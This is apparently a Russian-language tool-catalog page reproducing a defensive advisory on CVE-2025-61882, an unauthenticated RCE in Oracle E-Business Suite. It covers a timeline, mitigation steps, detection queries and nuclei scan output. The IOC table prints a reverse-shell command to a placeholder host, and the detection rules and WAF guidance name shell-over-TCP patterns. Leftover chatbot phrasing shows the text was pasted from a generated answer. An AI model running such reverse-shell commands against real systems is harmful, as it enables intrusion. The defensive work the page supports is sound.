Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-61882 — Предоставляет подробный advisory по CVE-2025-61882 с техническим анализом, IOCs, запросами обнаружения и шаблоном эксплойта на основе nuclei для pre-auth RCE в Oracle E-Business Suite. | Kitploit
Инструменты/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеРазведка угрозРеагирование на Инциденты
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Предоставляет подробный advisory по CVE-2025-61882 с техническим анализом, IOCs, запросами обнаружения и шаблоном эксплойта на основе nuclei для pre-auth RCE в Oracle E-Business Suite.

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️🚨 CVE‑2025‑61882 — Критическое удалённое выполнение кода без аутентификации в Oracle E‑Business Suite (EBS) 🚨🛡️

Краткое описание: Критическое удалённое выполнение кода без аутентификации в Oracle E‑Business Suite (EBS) — затрагивает версии 12.2.3 → 12.2.14, CVSS 9.8, активно эксплуатируется в реальных атаках (сообщается о вымогательстве/шантаже). ([oracle.com][1])


📌 Краткие факты (таблица)

ПолеДетали
🆔 CVECVE‑2025‑61882
🧾 Продукт / КомпонентOracle E‑Business Suite (EBS) — интеграция Concurrent Processing / BI Publisher
📦 Затронутые версии12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ ТипУдалённое выполнение кода (RCE) — аутентификация не требуется
🔥 Эксплуатируется в реальных атакахДа — сообщается о массовых атаках / кампаниях вымогательства
📅 Раскрытие / хронологияОктябрь 2025 (уведомление вендора + публичные отчёты). ([oracle.com][1])

(Выше — сводка из уведомления вендора, NVD/CISA и нескольких аналитических отчётов вендоров.) ([oracle.com][1])


💥 Влияние (таблица)

Область влиянияЧто это означает
🔓 КонфиденциальностьЗлоумышленники могут читать чувствительные данные HR/финансов/ERP
🛠️ ЦелостностьЗлоумышленники могут изменять записи, создавать бэкдоры или изменять конфигурации
⚡ ДоступностьЗлоумышленники могут нарушить работу сервисов, запустить программы‑вымогатели или уничтожить резервные копии
🧭 Уровень рискаЭкстремальный — RCE без аутентификации в критической ERP‑системе → возможный полный захват домена

Ссылки на отчёты о высокоэффективной эксплуатации и связи с программами‑вымогателями. ([Rapid7][2])


🛠️ Техническое описание (кратко)

  • Вектор: HTTP/HTTPS‑запросы к открытым веб‑эндпоинтам EBS запускают цепочку уязвимостей в интеграции Concurrent Processing / BI Publisher, приводящую к удалённому выполнению кода. ([oracle.com][1])
  • Сложность: Низкая (без аутентификации, без взаимодействия с пользователем). ([nvd.nist.gov][3])
  • Наблюдаемые полезные нагрузки: reverse shell, веб‑шеллы, скрипты для кражи данных и вымогательства. ([Rapid7][2])

🕵️‍♀️ Индикаторы компрометации (IOC) — примеры (таблица)

Oracle и команды реагирования на инциденты опубликовали IOC; ниже приведены репрезентативные примеры из уведомлений и отчётов вендоров. Ищите эти паттерны в журналах и на конечных точках. ([oracle.com][1])

ТипПример
🌐 IP‑адреса (наблюдаемые)200.107.207.26, 185.181.60.11 (примеры адресов из отчётов)
🧾 Паттерн командыsh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Хеши файловНесколько SHA‑256 хешей подозрительных эксплойт‑скриптов (полный список — в уведомлении вендора)
🕳️ АртефактыНеожиданные веб‑шеллы, новые cron‑задания, подозрительные исходящие соединения на необычные IP/порты

Если вам нужен полный список IOC (IP‑адреса, полные хеши, имена файлов), я могу вставить его сюда — напишите «вставь IOC». (Без ссылок.)


🧭 Хронология (компактно)

ДатаСобытие
9 августа 2025Самая ранняя зафиксированная реальная эксплуатация (телеметрия вендора). ([crowdstrike.com][4])
Начало октября 2025Oracle выпустила предупреждение безопасности / патчи для EBS. ([oracle.com][1])
6–7 октября 2025CISA добавила CVE в каталог Known Exploited Vulnerabilities (KEV) (рекомендации для федеральных агентств, сроки устранения). ([cisa.gov][5])
Октябрь 2025 (продолжается)Множественные отчёты вендоров и сообщения о массовой эксплуатации (CrowdStrike, Rapid7, Tenable и др.). ([crowdstrike.com][4])

✅ Немедленные рекомендуемые действия (таблица шагов)

ПриоритетДействиеПримечания / примеры
1️⃣ КритическийУстановить патчи на затронутые экземпляры EBSНемедленно примените патчи из Security Alert Oracle для версий 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ ВысокийИзолировать / ограничить доступ к веб‑эндпоинтам EBSЗаблокируйте доступ к HTTP/HTTPS EBS из интернета; разрешите только доверенные IP администраторов или VPN.
3️⃣ ВысокийВключить/настроить правила WAFРазверните сигнатуры WAF от вендоров/сообщества для паттернов эксплойта; блокируйте подозрительные полезные нагрузки. ([Rapid7][2])
4️⃣ ВысокийПоиск и обнаружениеИщите в журналах команды reverse shell, аномальные записи файлов и исходящие соединения с IOC.
5️⃣ ИнцидентСдерживание и реагирование при обнаружении компрометацииИзолируйте хост, сохраните криминалистические доказательства, смените учётные данные, восстановите из чистых резервных копий.
6️⃣ ПолитикаОтчётность и уведомлениеЕсли вы подпадаете под регуляторные/контрактные требования, уведомите заинтересованные стороны и органы власти согласно политике (может применяться руководство CISA/KEV). ([nvd.nist.gov][3])

💀 Эксплойты :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ Примеры запросов для обнаружения (готовы к копированию)

Splunk (поиск паттерна reverse shell):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

Sigma‑правило (концептуальное):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(Настройте имена полей под свою схему журналов; используйте IOC для уточнения.)


🔐 Примеры мер для межсетевых экранов / WAF (примеры)

  • Сетевой ACL: Заблокируйте входящий 80/443 к серверам EBS из публичного интернета; разрешите только управляющий VPN и конкретные IP администраторов.
  • Правило WAF (псевдокод): Блокируйте запросы, содержащие bash -i, /dev/tcp/, base64 -d или типичные паттерны эксплойт‑полезных нагрузок в телах POST или параметрах URL.
  • Ограничение скорости / гео‑блокировка: Временно ограничьте скорость запросов к эндпоинтам EBS и блокируйте трафик из известных вредоносных регионов, если это соответствует бизнес‑потребностям.

🧾 Чек‑лист установки патчей (кратко)

  1. Сделайте резервные копии и снапшоты VM ✅
  2. Протестируйте патч в staging (если возможно) ✅
  3. Примените патч из Oracle Security Alert к EBS 12.2.3–12.2.14 ✅ (следуйте шагам вендора: остановите сервисы, примените патч, выполните задачи после установки) ([oracle.com][1])
  4. Перезапустите и проверьте работоспособность сервисов ✅
  5. Повторно просканируйте на артефакты компрометации и проведите полную криминалистическую проверку хостов ✅

🧠 Примечания о злоумышленниках / эксплуатации

  • Множество вендоров связывают активную эксплуатацию с группами, занимающимися вымогательством/программами‑вымогателями (например, Cl0p / Graceful Spider или связанными акторами) — используется для кражи данных и вымогательства. Уровень уверенности в атрибуции различается у разных вендоров. ([crowdstrike.com][4])

📋 Для команд SOC / IR — чек‑лист playbook

  • Триаж: Входящая попытка эксплойта? Захватите HTTP‑запрос, заголовки, тело POST.
  • Сдерживание: Изолируйте сеть затронутого хоста.
  • Криминалистика: Соберите память, образ диска, журналы веб‑сервера, журналы аудита.
  • Устранение: Пересоберите хост из чистого образа при подтверждении компрометации.
  • Восстановление: Восстановите из заведомо исправных резервных копий; смените учётные данные.
  • Отчётность: Зарегистрируйте инцидент, уведомите заинтересованные стороны, соблюдайте руководство KEV/CISA, если применимо. ([nvd.nist.gov][3])

🔎 Источники (краткий список авторитетных отчётов)

(Я перечисляю источники для точности — не вставляю ссылки, но это названия вендоров/органов, чтобы вы могли обратиться к ним при необходимости.)

  • Oracle Security Alert / Доступность патчей (уведомление вендора). ([oracle.com][1])
  • NVD / CISA (запись в каталоге CISA KEV и метаданные NVD). ([nvd.nist.gov][3])
  • Технический отчёт CrowdStrike о кампаниях. ([crowdstrike.com][4])
  • Анализы и FAQ от Rapid7 / Tenable / других вендоров. ([Rapid7][2])

Вот профессиональный отказ от ответственности с эмодзи, который вы можете использовать для своего отчёта по CVE‑2025‑61882:


⚠️💀 Отказ от ответственности 💀⚠️

Информация, представленная в этом отчёте, предназначена только для осведомлённости, защиты и образовательных целей. Использование этой информации для эксплуатации, атаки или компрометации любой системы без явного разрешения незаконно и может повлечь уголовную и гражданскую ответственность.

🔒 Всегда применяйте рекомендуемые патчи, следуйте лучшим практикам безопасности и проводите тестирование только в контролируемых средах.

🧾 Этот отчёт не заменяет официальные уведомления вендора — всегда обращайтесь к Oracle Security Alerts и авторизованным руководствам для получения окончательных инструкций по устранению уязвимости.

Скачать инструмент